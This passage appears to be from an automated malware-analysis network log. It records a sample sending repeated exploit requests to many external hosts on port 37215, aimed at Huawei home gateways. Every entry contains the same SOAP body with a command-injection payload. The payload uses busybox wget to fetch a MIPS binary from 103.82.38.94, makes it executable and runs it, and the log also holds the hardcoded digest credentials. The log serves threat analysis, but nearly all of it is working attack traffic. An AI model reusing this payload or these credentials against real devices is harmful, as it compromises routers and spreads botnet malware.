                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.144893241.128.35.5937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092009068 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.1459520156.150.211.6737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092025042 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.144552841.203.92.24537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092072010 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.144787841.202.231.5237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092104912 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.1444590197.143.96.11637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092117071 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.1455808156.119.146.17437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092150927 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.1445216156.177.28.1037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092180014 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.144028441.8.213.12037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092202902 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.144247441.133.250.5037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092220068 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.1439980156.254.160.13637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092250109 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 